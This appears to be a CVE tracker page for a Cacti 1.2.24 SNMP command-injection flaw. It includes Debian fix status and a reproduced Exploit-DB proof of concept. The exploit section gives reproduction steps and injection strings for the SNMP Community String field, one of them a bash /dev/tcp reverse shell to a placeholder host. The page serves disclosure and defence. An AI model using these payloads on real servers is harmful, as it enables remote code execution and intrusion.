CVE-2023-39362

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Cacti is an open source operational monitoring and fault management framework. In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server. The `lib/snmp.php` file has a set of functions, with similar behavior, that accept in input some variables and place them into an `exec` call without a proper escape or validation. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-51740 webapps php text · 3 KB

Antonio Francesco Sardella · 2023-10-09

Cacti 1.2.24 - Authenticated command injection when using SNMP options

text exploit Source: Exploit-DB

# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options
# Date: 2023-07-03
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://www.cacti.net/
# Software Link: https://www.cacti.net/info/downloads
# Version: Cacti 1.2.24
# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container
# CVE: CVE-2023-39362
# Category: WebApps
# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
# Vulnerability discovered and reported by: Antonio Francesco Sardella

=======================================================================================
Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)
=======================================================================================

-----------------
Executive Summary
-----------------

In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server.

-------
Exploit
-------

Prerequisites:
    - The attacker is authenticated.
    - The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".
    - A Device that supports SNMP can be used.
    - Net-SNMP Graphs can be used.
    - snmp module of PHP is not installed.

Example of an exploit:
    - Go to "Console" > "Create" > "New Device".
    - Create a Device that supports SNMP version 1 or 2.
    - Ensure that the Device has Graphs with one or more templates of:
        - "Net-SNMP - Combined SCSI Disk Bytes"
        - "Net-SNMP - Combined SCSI Disk I/O"
        - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)
    - In the "SNMP Options", for the "SNMP Community String" field, use a value like this:
        public\' ; touch /tmp/m3ssap0 ; \'
    - Click the "Create" button.
    - Check under /tmp the presence of the created file.

To obtain a reverse shell, a payload like the following can be used.

    public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host).

----------
Root Cause
----------

A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).

----------
References
----------

    - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
    - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html
    - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1.2.25+ds1-1`
sid	Fixed	`1.2.25+ds1-1`
forky	Fixed	`1.2.25+ds1-1`
bullseye	Fixed	`1.2.16+ds1-2+deb11u2`
bookworm	Fixed	`1.2.24+ds1-1+deb12u1`

References

https://security-tracker.debian.org/tracker/CVE-2023-39362

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.